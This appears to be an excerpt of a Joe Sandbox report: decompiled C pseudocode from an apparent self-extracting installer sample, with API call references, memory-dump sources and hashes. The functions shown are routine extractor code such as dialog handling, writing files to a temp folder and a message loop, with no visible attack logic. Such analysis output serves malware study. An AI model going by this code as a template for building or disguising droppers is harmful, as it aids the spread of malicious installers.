                                                                                                                                                                                                                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                                					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                                					_t39 = _t36;
                                                                                                                                                                                                                                                					if(_t36 == 0xbb40e64e || ( *0x108004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                                						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                                						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x108004 = _t39;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t37 =  !_t36;
                                                                                                                                                                                                                                                				 *0x108008 = _t37;
                                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00107182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00107191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0010719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 001071A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 001071B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: 7156c22a44a44c4260ac0ff9746be96d334b50d84711a95d76783070207f6656
                                                                                                                                                                                                                                                • Instruction ID: e9b5389372caa7951ba0b9e8e03e247310f3eb472c2cbc56d65c5f946fc9bfaf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7156c22a44a44c4260ac0ff9746be96d334b50d84711a95d76783070207f6656
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3113A71D05208DBCB10DFB8DA48A9EBBF4FF08310FA14865E881E7294EBB09A458F45
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E001019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v520;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t27 = __ebx;
                                                                                                                                                                                                                                                				_t11 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                                				_t34 = _a4;
                                                                                                                                                                                                                                                				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                                					E001043D0(_t34, _t15);
                                                                                                                                                                                                                                                					_v520 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x109a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                                					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if(_t14 != 1) {
                                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t32 = _a12;
                                                                                                                                                                                                                                                						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							_t23 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00101A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00101A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 00101A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00101A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 00101A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 2dd7e1abc4968b352853cce398cae506a5d690f1622ceaff7ba30d3568e675aa
                                                                                                                                                                                                                                                • Instruction ID: f4a02202756dd9b42f7012ebe774a44626a8a3f91be202cbeca63ed47dd9926a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd7e1abc4968b352853cce398cae506a5d690f1622ceaff7ba30d3568e675aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011ED31600259EFDB00EF68EE08AAE77B8FF09300F408150FA92935D0CBB49E81CB95
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E001063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				long _v272;
                                                                                                                                                                                                                                                				void* _v276;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                                				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_v276 = _a16;
                                                                                                                                                                                                                                                				_t37 = 1;
                                                                                                                                                                                                                                                				E00101781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                                				E0010658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                                					_t28 = _a4;
                                                                                                                                                                                                                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                                						 *0x109124 = 0x80070052;
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					CloseHandle(_t39);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					 *0x109124 = 0x80070052;
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001063EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-3290032183
                                                                                                                                                                                                                                                • Opcode ID: 4b9ce9641cb8fbc95ce85f8bd16a4382a50cd0f20e782f690ad3b47dbff49c49
                                                                                                                                                                                                                                                • Instruction ID: 6065ec78ce5324f6d8d13fd9cd4386f7199e45ab14c702dcfab1776e8c0be132
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9ce9641cb8fbc95ce85f8bd16a4382a50cd0f20e782f690ad3b47dbff49c49
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821C0B1A0021CAFDB10DF25DC85FEA7368EB58314F0041A9B5C5A3280DBF45D958FA4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001047E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                                				void _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                                					_t22 = _t33;
                                                                                                                                                                                                                                                					_t27 = _t22 + 1;
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t6 =  *_t22;
                                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                                					} while (_t6 != 0);
                                                                                                                                                                                                                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                                					 *_t34 = _t24;
                                                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                                                						_t28 = _t33;
                                                                                                                                                                                                                                                						_t19 = _t28 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t9 =  *_t28;
                                                                                                                                                                                                                                                							_t28 = _t28 + 1;
                                                                                                                                                                                                                                                						} while (_t9 != 0);
                                                                                                                                                                                                                                                						E00101680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                                						_t11 =  *0x1091e0; // 0x2c18e20
                                                                                                                                                                                                                                                						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                                						 *0x1091e0 = _t34;
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t25 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                					E001044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					LocalFree(_t34);
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                				E001044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00104E6F), ref: 001047EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00104823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00104847
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00104851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-3290032183
                                                                                                                                                                                                                                                • Opcode ID: eec4213871f931a2e336a54c2e022108b69bcc0ea0afbd26a22be2f05c2e5e98
                                                                                                                                                                                                                                                • Instruction ID: 440ebf25737c02b369272c0ae65e175c81e1814be309fbd24fdc0550bef22d8b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eec4213871f931a2e336a54c2e022108b69bcc0ea0afbd26a22be2f05c2e5e98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC1102F5204641AFD7288F749C98F723B5AEB85310B04C91AFBC2DB681DBF58C068660
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00106517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                				struct HRSRC__* _t6;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                                				int _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t23 =  *0x109a3c; // 0x100000
                                                                                                                                                                                                                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                					E001044B9(0, 0x4fb, 0, 0, 0x10, 0);
        _t24 = _a16;
    } else {
        _t21 = LoadResource(_t23, _t6);
        if(_t21 == 0) {
            goto L6;
        } else {
            if(_a12 != 0) {
                _push(_a12);
            } else {
                _push(0);
            }
            _t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
            FreeResource(_t21);
            if(_t24 == 0xffffffff) {
                goto L6;
            }
        }
    }
    return _t24;
}







APIs
• FindResourceA.KERNEL32(00100000,000007D6,00000005), ref: 0010652A
• LoadResource.KERNEL32(00100000,00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00106538
• DialogBoxIndirectParamA.USER32(00100000,00000000,00000547,001019E0,00000000), ref: 00106557
• FreeResource.KERNEL32(00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00106560
Memory Dump Source
• Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: 955a1deb99a2aa4f3f600020cfd266d2cded678af96ddbbe99ca20d10a01d3ae
• Instruction ID: ef1e26d9f9ec8275b32deae3e853cb88d4ef22cb569a945f8f663f14c2d93b8b
• Opcode Fuzzy Hash: 955a1deb99a2aa4f3f600020cfd266d2cded678af96ddbbe99ca20d10a01d3ae
• Instruction Fuzzy Hash: BE01D672200619BBDB105F69AC48DBB7A6CEF897A1F414125FE90E3194DBF18D6086A1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00103680(void* __ecx) {
    void* _v8;
    struct tagMSG _v36;
    int _t8;
    struct HWND__* _t16;

    _v8 = __ecx;
    _t16 = 0;
    while(1) {
        _t8 = MsgWaitForMultipleObjects(1, &_v8, 0, 0xffffffff, 0x4ff);
        if(_t8 == 0) {
            break;
        }
        if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
            continue;
        } else {
            do {
                if(_v36.message != 0x12) {
                    DispatchMessageA( &_v36);
                } else {
                    _t16 = 1;
                }
                _t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
            } while (_t8 != 0);
            if(_t16 == 0) {
                continue;
            }
        }
        break;
    }
    return _t8;
}







                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0010369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 001036CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: 4f365077b17e631a2b1db2d66656333e6d1b281cd5d3295e5e22e5b0079c0fa2
                                                                                                                                                                                                                                                • Instruction ID: 243e80156f75c1db61751185d3369309f8e294b78e56abbc695c0716d87042f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f365077b17e631a2b1db2d66656333e6d1b281cd5d3295e5e22e5b0079c0fa2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8301677290025977DB305BA65C4CEEB767CEBC6B10F140119F955E21C0D6F1C784C6B1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E001065E8(char* __ecx) {
                                                                                                                                                                                                                                                				char _t3;
                                                                                                                                                                                                                                                				char _t10;
                                                                                                                                                                                                                                                				char* _t12;
                                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                                                                				_t15 = __ecx;
                                                                                                                                                                                                                                                				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t3 =  *_t12;
                                                                                                                                                                                                                                                					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                                				} while (_t3 != 0);
                                                                                                                                                                                                                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                                					if(_t16 <= _t15) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                                							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t16 = _t10;
                                                                                                                                                                                                                                                						_t10 = 1;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_push(_t16);
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return _t10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00102B33), ref: 00106602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00106612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00106629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 00106635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: 9f906c4bf5fd422aa0b3973452d950c6957d0eac048018f971ad2721f4f82a2a
                                                                                                                                                                                                                                                • Instruction ID: 783b166e82a63e5b329eee23ea0c57b9319e0a13e3e347089b6f508b84409ec9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f906c4bf5fd422aa0b3973452d950c6957d0eac048018f971ad2721f4f82a2a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF028320046506EE7325B288C888BBBF9CCF87354B2901AFF5D182441D7E60D468661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001069B0() {
                                                                                                                                                                                                                                                				intOrPtr* _t4;
                                                                                                                                                                                                                                                				intOrPtr* _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				 *0x1081f8 = E00106C70();
                                                                                                                                                                                                                                                				__set_app_type(E00106FBE(2));
                                                                                                                                                                                                                                                				 *0x1088a4 =  *0x1088a4 | 0xffffffff;
                                                                                                                                                                                                                                                				 *0x1088a8 =  *0x1088a8 | 0xffffffff;
                                                                                                                                                                                                                                                				_t4 = __p__fmode();
                                                                                                                                                                                                                                                				_t11 =  *0x108528; // 0x0
                                                                                                                                                                                                                                                				 *_t4 = _t11;
                                                                                                                                                                                                                                                				_t5 = __p__commode();
                                                                                                                                                                                                                                                				_t12 =  *0x10851c; // 0x0
                                                                                                                                                                                                                                                				 *_t5 = _t12;
                                                                                                                                                                                                                                                				_t6 = E00107000();
                                                                                                                                                                                                                                                				if( *0x108000 == 0) {
                                                                                                                                                                                                                                                					__setusermatherr(E00107000);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E001071EF(_t6);
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00106FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00106FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 001069C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 001069D8
